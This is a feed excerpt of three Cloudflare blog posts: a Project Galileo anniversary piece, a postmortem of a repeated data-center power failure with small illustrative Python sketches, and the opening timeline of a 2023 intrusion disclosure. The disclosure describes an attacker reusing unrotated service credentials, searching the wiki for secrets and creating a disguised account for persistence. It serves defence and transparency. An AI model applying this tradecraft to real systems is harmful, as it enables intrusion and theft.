    <p>On June 6, we celebrated Project Galileo’s 10-year anniversary with partners from government, civil society, and industry at an event in Washington, DC. We used the opportunity to talk about the future of the Internet, and how we can all work together to protect and advance the free and open Internet.</p><p>For humanitarian organizations with few resources, the types of services offered under Project Galileo can be life changing. At our Project Galileo event, we heard the story of a small French nonprofit that lost 17 years of data after being targeted by ransomware. Our resources help organizations defend themselves not only against nation states determined to take them offline, but also against common ransomware and <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/">phishing</a> attacks.</p><p>During our event, the President of the <a href="https://www.ned.org/">National Endowment for Democracy (NED)</a> told the story of traveling in the Western Balkans where the struggle for an independent media is palpable. NED is a strong supporter of media outlets across the region. But those media outlets come under frequent cyber attacks that have incapacitated their websites. As described by Damon Wilson:</p><blockquote><p><i>Those attacks prevent news from reaching the public, where information is very much something that is used and weaponized against communities across Bosnia. And this was precisely the case with one of our partners, Buka. It's a news outlet that's based in Banja Luka in Republika Srpska. And while I was there, I met with some of our partners from Banja Luka who had been physically beaten up and intimidated. There's a crackdown on civil society, new restrictions and laws against them. But for Buka, it was a little bit of a different scenario because earlier this year they suffered a DDoS attack, during which their servers were overwhelmed by up to 700 million page requests. 
And the sheer volume suggests the attackers had significant resources, making it a particularly severe threat.</i></p><p><i>But by onboarding Buka into Project Galileo, we were able to help them restore their site’s functionality, and now Buka’s website is equipped to withstand even the most sophisticated attacks, ensuring that their critical reporting continues uninterrupted, exactly at the time when the Republika Srpska government is looking to close and restrict independent civic voices in that part of Bosnia.</i></p><p><i>And this is just one example, from last week traveling in Bosnia, of the numerous NED partners who've benefited from Cloudflare's Project Galileo since NED became a partner in 2019. It's proof of the efficacy of our partners’ work. It effectively ensures that bad actors can't silence the voices and the work of democracy advocates and independent media around the world.</i></p></blockquote>
    <div>
      <h3>The importance of collaboration</h3>
      <a href="#the-importance-of-collaboration">
        
      </a>
    </div>
    <p>Our work with Project Galileo highlights the power of the partnerships that we’ve built, not only with civil society, but with government and industry partners as well. By working together, we can expand protections for the many at-risk organizations that need cybersecurity assistance. Cybersecurity is a team sport.</p><p>In 2023, one of our Project Galileo partners, the <a href="https://cyberpeaceinstitute.org/">CyberPeace Institute</a>, approached us about doing even more to help protect nonprofit organizations against phishing attacks. The CyberPeace Institute collaborates with its partners to reduce the harms from cyberattacks on people’s lives worldwide and provide them assistance. CyberPeace also analyzes cyberattacks to expose their societal impact, to demonstrate how international laws and norms are being violated, and to advance responsible behavior in cyberspace.</p><p>CyberPeace realized that there was an opportunity to document attacks against civil society groups and improve the ecosystem for everyone. Many development and humanitarian organizations are small, with limited staff and little cybersecurity experience. They can easily fall prey to common cyber attacks – like phishing – designed to access their systems or steal their data. Even when they do manage to use tools effectively to defend themselves, they typically do not report information about the attacks they see.</p><p>CyberPeace proposed to help onboard development and humanitarian organizations to Cloudflare services through their <a href="https://cpb.ngo/">CyberPeace Builders program</a> and analyze the phishing campaigns targeting those organizations. The substantive insights and information gained from that work could then be fed to other civil society organizations as real-time security alerts. 
Cloudflare worked with CyberPeace to develop the new approach, enabling their volunteers to onboard organizations in their network to Area 1 tools and their analysts to access threat indicators from the collective organizations onboarded.  </p><p>Government can play an important role in helping protect civil society from cyberattacks as well. Since the <a href="https://www.state.gov/summit-for-democracy/">Summit for Democracy</a> last year, Cloudflare has been working closely with the Joint Cyber Defense Collaborative (JCDC), which is run by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), on their High-Risk Communities initiative. Earlier this year, JCDC launched a <a href="https://www.cisa.gov/audiences/high-risk-communities">web page</a> outlining cybersecurity resources for civil society communities facing digital security threats because of their work. The effort includes <a href="https://www.cisa.gov/audiences/high-risk-communities/cybersecurity-resources-high-risk-communities">tools and services</a> that nonprofits can use to secure themselves online, including those offered under Project Galileo.</p>
    <div>
      <h3>Expanding Cloudflare’s Impact</h3>
      <a href="#expanding-cloudflares-impact">
        
      </a>
    </div>
    <p>In many ways, the creation of Project Galileo altered the trajectory of the company. Project Galileo cemented the idea that protecting and keeping important organizations online, regardless of whether they could pay us, was part of Cloudflare’s DNA. It pushed us to innovate to improve security not only for the large enterprises that pay us, but for the small organizations doing good for the world that cannot afford to pay for the latest technological innovation. It gave us our mission – to help build a better Internet – and a standard to live up to and measure ourselves against.</p><p>To meet that standard, we routinely reach out to offer our services to important organizations in need. In 2022, after Russia’s invasion of Ukraine, Cloudflare jumped in to offer services to Ukrainian critical infrastructure facing a barrage of cyberattacks and has continued providing them services ever since. At our Project Galileo event, the State Department’s Special Envoy and Coordinator for Digital Freedom read an email she’d received the night before from Ukraine’s Deputy Foreign Minister and Chief Digital Transformation Officer:</p><blockquote><p><i>It is absolutely definite that Cloudflare services provide a vital layer of cybersecurity within the Ukrainian segment of cyberspace. Numerous DDoS attacks are directed at state electronic services, fintech, official information sources. So if there was no Cloudflare as a proven protection against DDoS attacks, it would have serious consequences causing chaos, especially when these attacks are synchronized by the enemy in parallel with kinetic attacks.</i></p></blockquote><p>We’ve <a href="/announcing-cloudflare-radar-outage-center">launched</a> sections of Cloudflare Radar designed to use Cloudflare’s network to help civil society monitor Internet outages and disruptions, as well as route hijacks and other traffic anomalies. 
We’ve participated in the <a href="https://freedomonlinecoalition.com/task_forces_and_wg/task-force-on-internet-shutdowns/">Freedom Online Coalition’s Task Force on Internet Shutdowns</a>.</p><p>Project Galileo also helped pave the way for a variety of Cloudflare projects to provide other at-risk populations free services. These programs include:</p><ul><li><p><a href="https://www.cloudflare.com/athenian/"><b>Athenian Project</b></a>: Launched in 2017, the Athenian Project is Cloudflare’s program to protect election-related domains for state and local governments so that citizens have reliable access to information on voter registration, polling places, and the reporting of election results.</p></li><li><p><a href="https://www.cloudflare.com/campaigns/"><b>Cloudflare for Campaigns</b></a>: Launched in 2020, Cloudflare for Campaigns helps secure US political candidates’ election websites and internal data while also ensuring site reliability during peak traffic periods. The program is run in partnership with Defending Digital Campaigns.</p></li><li><p><a href="https://www.cloudflare.com/pangea/"><b>Project Pangea</b></a>: Launched in 2021, Project Pangea is a program to provide secure, performant and reliable access to the Internet for community networks that support underserved communities.</p></li><li><p><a href="https://www.cloudflare.com/lp/project-safekeeping/"><b>Project Safekeeping</b></a>: Launched in 2022, Project Safekeeping supports at-risk critical infrastructure entities in Australia, Japan, Germany, Portugal, and the UK by providing Zero Trust and application security solutions.</p></li><li><p><a href="https://www.cloudflare.com/lp/cybersafe-schools/"><b>Project Cybersafe Schools</b></a>: Launched in 2023, Project Cybersafe Schools equips small public school districts in the US with Zero Trust services, including email protection and DNS filtering.</p></li><li><p><a href="/heeding-the-call-to-support-australias-most-at-risk-entities/"><b>Project Secure 
Health</b></a>: Launched on June 10, 2024, Project Secure Health provides security tools to Australia’s general practitioner clinics to safeguard patient data and counter challenges such as data breaches, ransomware attacks, phishing scams, and insider threats.</p></li></ul>
    <div>
      <h3>Looking forward</h3>
      <a href="#looking-forward">
        
      </a>
    </div>
    <p>The world has only gotten more complicated since we first launched Project Galileo in 2014. We face real challenges ranging from <a href="https://www.cloudflare.com/the-net/government/critical-infrastructure/">malicious cyber actors targeting critical infrastructure</a>, to election interference, to data theft. Governments have responded with increasingly aggressive attempts to control aspects of the Internet. At our recent celebration of Project Galileo, we lamented the thirteenth consecutive year of decline of global Internet freedom, as <a href="https://freedomhouse.org/sites/default/files/2023-10/Freedom-on-the-net-2023-DigitalBooklet.pdf">documented</a> by our Project Galileo partner Freedom House.</p><p>But one thing has not changed. We continue to believe the single, global Internet is a miracle that we should all be fighting for. We sometimes forget that the Internet is an incredibly radical concept. The world somehow came together over the last 40 years, agreed on a set of standards, and then made it so that a collection of networks could all exchange data. And that miracle that is the Internet has brought incredible opportunities for the voices of civil society to be heard, to help extend their impact, to spread their message, and to keep them connected.</p><p>Connecting everyone online in a permissionless way comes with real harms and real risks. But we need to be surgical as we address those challenges. We need to partner to find solutions that preserve the open Internet, much as we do with projects like Project Galileo. Even if we are at a moment of democratic decline, continuing to defend the open, interoperable Internet preserves space and capacity for a future in which the Internet can also fuel greater freedom.</p> ]]></content:encoded>
            <category><![CDATA[Project Galileo]]></category>
            <category><![CDATA[Cloudflare History]]></category>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Policy & Legal]]></category>
            <guid isPermaLink="false">1nBG09g7YJKTHpg8Yw0q2c</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Alissa Starzak</dc:creator>
        </item>
        <item>
            <title><![CDATA[Major data center power failure (again): Cloudflare Code Orange tested]]></title>
            <link>https://blog.cloudflare.com/major-data-center-power-failure-again-cloudflare-code-orange-tested/</link>
            <pubDate>Mon, 08 Apr 2024 13:00:15 GMT</pubDate>
            <description><![CDATA[ Just four months after a complete power outage at a critical data center we were hit with the exact same scenario.  Here’s how we did this time, and what’s next ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4fn80cCKCVWYn0XOOh3eX2/e23f4144cdb106dc80bd3b8a27f27254/image3-11.png" />
            
            </figure><p>Here's a post we never thought we'd need to write: less than five months after one of our major data centers lost power, it happened again to the exact same data center. That sucks and, if you're thinking "why do they keep using this facility??" I don't blame you. We're thinking the same thing. But, here's the thing, while a lot may not have changed at the data center, a lot changed over those five months at Cloudflare. So, while five months ago a major data center going offline was really painful, this time it was much less so.</p><p>This is a little bit about how a high-availability data center lost power for the second time in five months. But, more so, it's the story of how our team worked to ensure that even if one of our critical data centers lost power it wouldn't impact our customers.</p><p>On November 2, 2023, one of our critical facilities in the Portland, Oregon region lost power for an extended period of time. It happened because of a cascading series of faults that appears to have been caused by maintenance performed by the electrical grid provider, culminating in a ground fault at the facility, and was made worse by a series of unfortunate incidents that prevented the facility from getting back online in a timely fashion.</p><p>If you want to read all the gory details, they're available <a href="/post-mortem-on-cloudflare-control-plane-and-analytics-outage/">here</a>.</p><p>It's painful whenever a data center has a complete loss of power, but it's something that we were supposed to expect. Unfortunately, in spite of that expectation, we hadn't enforced a number of requirements on our products that would ensure they continued running in spite of a major failure.</p><p>That was a mistake we were never going to allow to happen again.</p>
    <div>
      <h3>Code Orange</h3>
      <a href="#code-orange">
        
      </a>
    </div>
    <p>The incident was painful enough that we declared what we called Code Orange. We borrowed the idea from Google which, when they have an existential threat to their business, reportedly declares a Code Yellow or Code Red. Our logo is orange, so we altered the formula a bit.</p><p>Our conception of Code Orange was that the person who led the incident, in this case our SVP of Technical Operations, Jeremy Hartman, would be empowered to charge any engineer on our team to work on what he deemed the highest priority project. (Unless we declared a Code Red, which we actually ended up doing due to a hacking incident, and which would then take even higher priority. If you're interested, you can read more about that <a href="/thanksgiving-2023-security-incident/">here</a>.)</p><p>After getting through the immediate incident, Jeremy quickly triaged the most important work that needed to be done in order to ensure we'd be highly available even in the case of another catastrophic failure of a major data center facility. And the team got to work.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Q7F31g2w6xPxdlq39dpDW/ad9a106fed84e8fcd728e165bfd2767a/image2-15.png" />
            
            </figure>
    <div>
      <h3>How'd we do?</h3>
      <a href="#howd-we-do">
        
      </a>
    </div>
    <p>We didn’t expect such an extensive real-world test so quickly, but the universe works in mysterious ways. On Tuesday, March 26, 2024, — just shy of five months after the initial incident — the same facility had another major power outage. Below, we'll get into what caused the outage this time, but what is most important is that it provided a perfect test for the work our team had done under Code Orange. So, what were the results?</p><p>First, let’s revisit what functions the Portland data centers at Cloudflare provide. As described in the November 2, 2023, <a href="/post-mortem-on-cloudflare-control-plane-and-analytics-outage/">post</a>, the control plane of Cloudflare primarily consists of the customer-facing interface for all of our services including our website and API. Additionally, the underlying services that provide the Analytics and Logging pipelines are primarily served from these facilities.</p><p>Just like in November 2023, we were alerted immediately that we had lost connectivity to our PDX01 data center. Unlike in November, we very quickly knew with certainty that we had once again lost all power, putting us in the exact same situation as five months prior. We also knew, based on a successful internal cut test in February, how our systems should react. We had spent months preparing, updating countless systems and activating huge amounts of network and server capacity, culminating with a test to prove the work was having the intended effect, which in this case was an automatic failover to the redundant facilities.</p><p>Our Control Plane consists of hundreds of internal services, and the expectation is that when we lose one of the three critical data centers in Portland, these services continue to operate normally in the remaining two facilities, and we continue to operate primarily in Portland. We have the capability to fail over to our European data centers in case our Portland centers are completely unavailable. 
However, that is a secondary option, and not something we pursue immediately.</p><p>On March 26, 2024, at 14:58 UTC, PDX01 lost power and our systems began to react. By 15:05 UTC, our APIs and Dashboards were operating normally, all without human intervention. Our primary focus over the past few months has been to make sure that our customers would still be able to configure and operate their Cloudflare services in case of a similar outage. There were a few specific services that required human intervention and therefore took a bit longer to recover; however, the primary interface mechanism was operating as expected.</p><p>To put a finer point on this, during the November 2, 2023, incident the following services had at least six hours of control plane downtime, with several of them functionally degraded for days:</p><ul><li><p>API and Dashboard</p></li><li><p>Zero Trust</p></li><li><p>Magic Transit</p></li><li><p>SSL</p></li><li><p>SSL for SaaS</p></li><li><p>Workers</p></li><li><p>KV</p></li><li><p>Waiting Room</p></li><li><p>Load Balancing</p></li><li><p>Zero Trust Gateway</p></li><li><p>Access</p></li><li><p>Pages</p></li><li><p>Stream</p></li><li><p>Images</p></li></ul><p>During the March 26, 2024, incident, all of these services were up and running within minutes of the power failure, and many of them did not experience any impact at all during the failover.</p><p>The data plane, which handles the traffic that Cloudflare customers pass through our data centers in over 300 cities worldwide, was not impacted.</p><p>Our Analytics platform, which provides a view into customer traffic, was impacted and wasn’t fully restored until later that day. This was expected behavior as the Analytics platform is reliant on the PDX01 data center. As with the Control Plane work, we began building new Analytics capacity immediately after the November 2, 2023, incident. However, the scale of the work means it will take a bit more time to complete. 
We have been working as fast as we can to remove this dependency, and we expect to complete this work in the near future.</p><p>Once we had validated the functionality of our Control Plane services, we were faced yet again with the cold start of a very large data center. This activity took roughly 72 hours in November 2023, but this time around we were able to complete this in roughly 10 hours. There is still work to be done to make that even faster in the future, and we will continue to refine our procedures in case we have a similar incident in the future.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7cu18EGvfdwXuXIr81qHN8/eaa05db6a5944d0270ed685ce558b070/Incident-inspection.png" />
            
            </figure>
    <div>
      <h3>How did we get here?</h3>
      <a href="#how-did-we-get-here">
        
      </a>
    </div>
    <p>As mentioned above, the power outage event from last November led us to introduce Code Orange, a process where we shift most or all engineering resources to addressing the issue at hand when there’s a significant event or crisis. Over the past five months, we shifted all non-critical engineering functions to focus on ensuring the high reliability of our control plane.</p><p>Teams across our engineering departments rallied to ensure our systems would be more resilient in the face of a similar failure in the future. Though the March 26, 2024, incident was unexpected, it was something we’d been preparing for.</p><p>The most obvious difference is the speed at which the control plane and APIs regained service. Without human intervention, the ability to log in and make changes to Cloudflare configuration was possible seven minutes after PDX01 was lost. This is due to our efforts to move all of our configuration databases to a Highly Available (HA) topology and to pre-provision enough capacity to absorb the capacity loss. More than 100 databases across over 20 different database clusters simultaneously failed out of the affected facility and restored service automatically. This was actually the culmination of over a year’s worth of work, and we prove our ability to fail over properly with weekly tests.</p><p>Another significant improvement is the updates to our Logpush infrastructure. In November 2023, the loss of the PDX01 data center meant that we were unable to push logs to our customers. During Code Orange, we invested in making the Logpush infrastructure HA in Portland, and additionally created an active failover option in Amsterdam. Logpush took advantage of our massively expanded Kubernetes cluster that spans all of our Portland facilities and provides a seamless way for service owners to deploy HA-compliant services that have resiliency baked in. 
In fact, during our February chaos exercise, we found a flaw in our Portland HA deployment, but customers were not impacted because the Amsterdam Logpush infrastructure took over successfully. During this event, we saw that the fixes we’d made since then worked, and we were able to push logs from the Portland region.</p><p>A number of other improvements in our Stream and Zero Trust products resulted in little to no impact to their operation. Our Stream products, which use a lot of compute resources to transcode videos, were able to seamlessly hand off to our Amsterdam facility to continue operations. Teams were given specific availability targets for the services and were provided several options to achieve those targets. Stream is a good example of a service that chose a different resiliency architecture but was able to seamlessly deliver their service during this outage. Zero Trust, which was also impacted in November 2023, has since moved the vast majority of its functionally to our hundreds of data centers, which kept working seamlessly throughout this event. Ultimately this is the strategy we are pushing all Cloudflare products to adopt as our data centers in <a href="https://www.cloudflare.com/network">over 300 cities worldwide</a> provide the highest level of availability possible.</p>
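<p>The automatic database failover described above can be sketched as a simple health-check loop: if the primary facility fails enough consecutive checks, a healthy replica in a surviving facility is promoted. A minimal illustration (the cluster names, threshold, and logic are hypothetical, not Cloudflare’s actual tooling):</p>

```python
# Hypothetical cluster state: one primary plus replicas in other facilities.
# Names and thresholds are illustrative, not Cloudflare's real topology.
CLUSTER = {
    "pdx01": {"role": "primary", "healthy": True},
    "pdx02": {"role": "replica", "healthy": True},
    "pdx03": {"role": "replica", "healthy": True},
}

FAILURE_THRESHOLD = 3  # consecutive failed health checks before failing over


def promote_first_healthy_replica(cluster):
    """Promote a healthy replica to primary and return its name."""
    for name, node in cluster.items():
        if node["role"] == "replica" and node["healthy"]:
            node["role"] = "primary"
            return name
    raise RuntimeError("no healthy replica available")


def run_failover_check(cluster, primary, consecutive_failures):
    """One iteration of the health-check loop; returns (primary, failure count)."""
    if cluster[primary]["healthy"]:
        return primary, 0
    consecutive_failures += 1
    if consecutive_failures >= FAILURE_THRESHOLD:
        cluster[primary]["role"] = "failed"
        return promote_first_healthy_replica(cluster), 0
    return primary, consecutive_failures


# Simulate losing the facility that hosts the primary.
CLUSTER["pdx01"]["healthy"] = False
primary, failures = "pdx01", 0
for _ in range(FAILURE_THRESHOLD):
    primary, failures = run_failover_check(CLUSTER, primary, failures)
print(primary)  # prints "pdx02": a surviving replica was promoted
```

<p>Production systems layer quorum, replication-lag checks, and fencing on top of a loop like this; the weekly failover tests mentioned above exercise essentially this path.</p>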
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4hnYtkVM6JHuvAOD3HGNmq/239ae0443184a22761245b4458e15ead/image1-12.png" />
            
            </figure>
    <div>
      <h3>What happened to the power in the data center?</h3>
      <a href="#what-happened-to-the-power-in-the-data-center">
        
      </a>
    </div>
    <p>On March 26, 2024, at 14:58 UTC, PDX01 experienced a total loss of power to Cloudflare’s physical infrastructure following a reportedly simultaneous failure of four Flexential-owned and operated switchboards serving all of Cloudflare’s cages. This meant both primary and redundant power paths were deactivated across the entire environment. During the Flexential investigation, engineers focused on a set of equipment known as Circuit Switch Boards, or CSBs. A CSB is comparable to an electrical panel board, consisting of a main input circuit breaker and a series of smaller output breakers. Flexential engineers reported that infrastructure upstream of the CSBs (power feed, generator, UPS &amp; PDU/transformer) was not impacted and continued to operate normally. Similarly, infrastructure downstream from the CSBs such as Remote Power Panels and connected switchgear was not impacted, implying the outage was isolated to the CSBs themselves.</p><p>Initial assessment of the root cause of Flexential’s CSB failures points to incorrectly set breaker coordination settings within the four CSBs as one contributing factor. Trip settings that are too restrictive can result in overly sensitive overcurrent protection and the potential nuisance tripping of devices. In our case, Flexential’s breaker settings within the four CSBs were reportedly too low in relation to the downstream provisioned power capacities. When one or more of these breakers tripped, a cascading failure of the remaining active CSBs resulted, causing a total loss of power serving Cloudflare’s cage and others on the shared infrastructure. During the triage of the incident, we were told that the Flexential facilities team noticed the incorrect trip settings, reset the CSBs and adjusted them to the expected values, enabling our team to power up our servers in a staged and controlled fashion. 
We do not know when these settings were established – typically, these would be set/adjusted as part of a data center commissioning process and/or breaker coordination study before customer critical loads are installed.</p>
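<p>Breaker coordination ultimately comes down to arithmetic: each breaker’s trip setting must exceed the load provisioned downstream of it by a comfortable margin, or routine load swings will nuisance-trip it. A toy check with made-up numbers (these are not Flexential’s actual values, and the margin is purely illustrative):</p>

```python
def trip_setting_ok(trip_amps, provisioned_amps, margin=1.25):
    """A trip setting is adequate only if it exceeds the downstream
    provisioned load by a coordination margin (margin value hypothetical)."""
    return trip_amps >= provisioned_amps * margin


# Made-up figures for a single CSB with 800 A provisioned downstream.
print(trip_setting_ok(trip_amps=1200, provisioned_amps=800))  # True: adequate headroom
print(trip_setting_ok(trip_amps=850, provisioned_amps=800))   # False: set too low; risks nuisance trips
```

<p>Real coordination studies also stagger trip curves over time so that a fault trips the breaker nearest to it rather than cascading upstream, which is what failed to happen here.</p>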
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3lJDAVlXMNrU7Eyp7PP0lF/db9a86dfa40f4ca85965d8af8b36c634/Incident-inspection-3.png" />
            
            </figure>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>Our top priority is completing the resilience program for our Analytics platform. Analytics aren’t simply pretty charts in a dashboard. When you want to check the status of attacks, see what a firewall is blocking, or even check the status of Cloudflare Tunnels, you need analytics. We have evidence that the resiliency pattern we are adopting works as expected, so this remains our primary focus, and we will progress as quickly as possible.</p><p>There were some services that still required manual intervention to properly recover, and we have collected data and action items for each of them to ensure that further manual action is not required. We will continue to use production cut tests to prove that all of these changes and enhancements provide the resiliency that our customers expect.</p><p>We will continue to work with Flexential on follow-up activities to expand our understanding of their operational and review procedures to the greatest extent possible. While this incident was limited to a single facility, we will turn this exercise into a process that ensures we have a similar view into all of our critical data center facilities.</p><p>Once again, we are very sorry for the impact to our customers, particularly those that rely on the Analytics engine and were unable to access that product feature during the incident. Our work over the past four months has yielded the results that we expected, and we will stay absolutely focused on completing the remaining body of work.</p> ]]></content:encoded>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[Outage]]></category>
            <guid isPermaLink="false">3jSHB2RGdy2XNScvpyF1oX</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>John Graham-Cumming</dc:creator>
            <dc:creator>Jeremy Hartman</dc:creator>
        </item>
        <item>
            <title><![CDATA[Thanksgiving 2023 security incident]]></title>
            <link>https://blog.cloudflare.com/thanksgiving-2023-security-incident/</link>
            <pubDate>Thu, 01 Feb 2024 20:00:24 GMT</pubDate>
            <description><![CDATA[ On Thanksgiving Day, November 23, 2023, Cloudflare detected a threat actor on our self-hosted Atlassian server. Our security team immediately began an investigation, cut off the threat actor’s access, and no Cloudflare customer data or systems were impacted by this event ]]></description>
            <content:encoded><![CDATA[ <p>On Thanksgiving Day, November 23, 2023, Cloudflare detected a threat actor on our self-hosted Atlassian server. Our security team immediately began an investigation, cut off the threat actor’s access, and on Sunday, November 26, we brought in CrowdStrike’s Forensic team to perform their own independent analysis.</p><p>Yesterday, CrowdStrike completed its investigation, and we are publishing this blog post to talk about the details of this security incident.</p><p>We want to emphasize to our customers that no Cloudflare customer data or systems were impacted by this event. Because of our access controls, firewall rules, and use of hard security keys enforced using our own Zero Trust tools, the threat actor’s ability to move laterally was limited. No services were implicated, and no changes were made to our global network systems or configuration. This is the promise of a Zero Trust architecture: it’s like bulkheads in a ship, where a compromise in one system is prevented from compromising the whole organization.</p><p>From November 14 to 17, a threat actor performed reconnaissance and then accessed our internal wiki (which uses Atlassian Confluence) and our bug database (Atlassian Jira). On November 20 and 21, we saw additional access indicating they may have come back to test that they still had connectivity.</p><p>They then returned on November 22 and established persistent access to our Atlassian server using ScriptRunner for Jira, gained access to our source code management system (which uses Atlassian Bitbucket), and tried, unsuccessfully, to access a console server that had access to a data center in São Paulo, Brazil, that Cloudflare had not yet put into production.</p><p>They did this by using one access token and three service account credentials that had been taken, and that we failed to rotate, after the <a href="/how-cloudflare-mitigated-yet-another-okta-compromise">Okta compromise of October 2023</a>. 
All threat actor access and connections were terminated on November 24 and CrowdStrike has confirmed that the last evidence of threat activity was on November 24 at 10:44.</p><p><i>(Throughout this blog post all dates and times are UTC.)</i></p><p>Even though we understand the operational impact of the incident to be extremely limited, we took this incident very seriously because a threat actor had used stolen credentials to get access to our Atlassian server and accessed some documentation and a limited amount of source code. Based on our collaboration with colleagues in the industry and government, we believe that this attack was performed by a nation state attacker with the goal of obtaining persistent and widespread access to Cloudflare’s global network.</p>
    <div>
      <h3>“Code Red” Remediation and Hardening Effort</h3>
      <a href="#code-red-remediation-and-hardening-effort">
        
      </a>
    </div>
    <p>On November 24, after the threat actor was removed from our environment, our security team pulled in all the people they needed across the company to investigate the intrusion and ensure that the threat actor had been completely denied access to our systems, and to ensure we understood the full extent of what they accessed or tried to access.</p><p>Then, from November 27, we redirected the efforts of a large part of the Cloudflare technical staff (inside and outside the security team) to work on a single project dubbed “Code Red”. The focus was strengthening, validating, and remediating any control in our environment to ensure we are secure against future intrusion and to validate that the threat actor could not gain access to our environment. Additionally, we continued to investigate every system, account and log to make sure the threat actor did not have persistent access and that we fully understood what systems they had touched and which they had attempted to access.</p><p>CrowdStrike performed an independent assessment of the scope and extent of the threat actor’s activity, including a search for any evidence that they still persisted in our systems. CrowdStrike’s investigation provided helpful corroboration and support for our investigation, but did not bring to light any activities that we had missed. This blog post outlines in detail everything we and CrowdStrike uncovered about the activity of the threat actor.</p><p>The only production system the threat actor could access using the stolen credentials was our Atlassian environment. Analyzing the wiki pages they accessed, bug database issues, and source code repositories, it appears they were looking for information about the architecture, security, and management of our global network; no doubt with an eye on gaining a deeper foothold. 
Because of that, we decided a huge effort was needed to further harden our security protocols to prevent the threat actor from gaining that foothold in case we had overlooked something in our log files.</p><p>Our aim was to prevent the attacker from using the technical information about the operations of our network as a way to get back in. Even though we believed, and later confirmed, the attacker had limited access, we undertook a comprehensive effort to rotate every production credential (more than 5,000 individual credentials), physically segment test and staging systems, perform forensic triage on 4,893 systems, and reimage and reboot every machine in our global network, including all the systems the threat actor accessed and all Atlassian products (Jira, Confluence, and Bitbucket).</p><p>The threat actor also attempted to access a console server in our new, and not yet in production, data center in São Paulo. All attempts to gain access were unsuccessful. To ensure these systems are 100% secure, equipment in the Brazil data center was returned to the manufacturers. The manufacturers’ forensic teams examined all of our systems to ensure that no access or persistence was gained. Nothing was found, but we replaced the hardware anyway.</p><p>We also looked for software packages that hadn’t been updated, user accounts that might have been created, and unused active employee accounts; we went searching for secrets that might have been left in Jira tickets or source code, and examined and deleted all HAR files uploaded to the wiki in case they contained tokens of any sort. Whenever in doubt, we assumed the worst and made changes to ensure anything the threat actor was able to access would no longer be in use and therefore no longer be valuable to them.</p><p>Every member of the team was encouraged to point out areas the threat actor might have touched, so we could examine log files and determine the extent of the threat actor’s access. 
By including such a large number of people across the company, we aimed to leave no stone unturned looking for evidence of access or changes that needed to be made to improve security.</p><p>The immediate “Code Red” effort ended on January 5, but work continues across the company around credential management, software hardening, vulnerability management, additional alerting, and more.</p>
    <div>
      <h3>Attack timeline</h3>
      <a href="#attack-timeline">
        
      </a>
    </div>
    <p>The attack started in October with the compromise of Okta, but the threat actor only began targeting our systems using those credentials from the Okta compromise in mid-November.</p><p>The following timeline shows the major events:</p>
    <div>
      <h3>October 18 - Okta compromise</h3>
      <a href="#october-18-okta-compromise">
        
      </a>
    </div>
    <p>We’ve <a href="/how-cloudflare-mitigated-yet-another-okta-compromise">written about this before</a> but, in summary, we were (for the second time) the victim of a compromise of Okta’s systems which resulted in a threat actor gaining access to a set of credentials. All of these credentials were meant to be rotated.</p><p>Unfortunately, out of the thousands of credentials leaked during the Okta compromise, we failed to rotate one service token and three service account credentials.</p><p>One was a Moveworks service token that granted remote access into our Atlassian system. The second credential was a service account used by the SaaS-based Smartsheet application that had administrative access to our Atlassian Jira instance. The third was a Bitbucket service account used to access our source code management system. The fourth was for an AWS environment that had no access to the global network and no customer or sensitive data.</p><p>The one service token and three accounts were not rotated because it was mistakenly believed they were unused. This was incorrect, and it was how the threat actor first got into our systems and gained persistent access to our Atlassian products. Note that this was in no way an error on the part of Atlassian, AWS, Moveworks or Smartsheet. These were merely credentials which we failed to rotate.</p>
    <div>
      <h3>November 14 09:22:49 - threat actor starts probing</h3>
      <a href="#november-14-09-22-49-threat-actor-starts-probing">
        
      </a>
    </div>
    <p>Our logs show that the threat actor began probing and performing reconnaissance of our systems on November 14, looking for ways to use the credentials and determining which systems were accessible. They attempted to log into our Okta instance and were denied access. They attempted to access the Cloudflare Dashboard and were denied access.</p><p>Additionally, the threat actor accessed an AWS environment that is used to power the Cloudflare Apps marketplace. This environment was segmented with no access to the global network or customer data. The service account used to access this environment was revoked, and we validated the integrity of the environment.</p>
    <div>
      <h3>November 15 16:28:38 - threat actor gains access to Atlassian services</h3>
      <a href="#november-15-16-28-38-threat-actor-gains-access-to-atlassian-services">
        
      </a>
    </div>
    <p>The threat actor successfully accessed Atlassian Jira and Confluence on November 15 using the Moveworks service token to authenticate through our gateway, and then they used the Smartsheet service account to gain access to the Atlassian suite. The next day they began looking for information about the configuration and management of our global network, and accessed various Jira tickets.</p><p>The threat actor searched the wiki for things like remote access, secret, client-secret, openconnect, cloudflared, and token. They accessed 36 Jira tickets (out of a total of 2,059,357 tickets) and 202 wiki pages (out of a total of 194,100 pages).</p><p>The threat actor accessed Jira tickets about vulnerability management, secret rotation, MFA bypass, network access, and even our response to the Okta incident itself.</p><p>The wiki searches and pages accessed suggest the threat actor was very interested in all aspects of access to our systems: password resets, remote access, configuration, our use of Salt, but they did not target customer data or customer configurations.</p>
    <div>
      <h3>November 16 14:36:37 - threat actor creates an Atlassian user account</h3>
      <a href="#november-16-14-36-37-threat-actor-creates-an-atlassian-user-account">
        
      </a>
    </div>
    <p>The threat actor used the Smartsheet credential to create an Atlassian account that looked like a normal Cloudflare user. They added this user to a number of groups within Atlassian so that they’d have persistent access to the Atlassian environment should the Smartsheet service account be removed.</p>
    <div>
      <h3>November 17 14:33:52 to November 20 09:26:53 - threat actor takes a break from accessing Cloudflare systems</h3>
      <a href="#november-17-14-33-52-to-november-20-09-26-53-threat-actor-takes-a-break-from-accessing-cloudflare-systems">
        
      </a>
    </div>
    <p>During this period, the attacker took a break from accessing our systems (apart from apparently briefly testing that they still had access) and returned just before Thanksgiving.</p>
    <div>
      <h3>November 22 14:18:22 - threat actor gains persistence</h3>
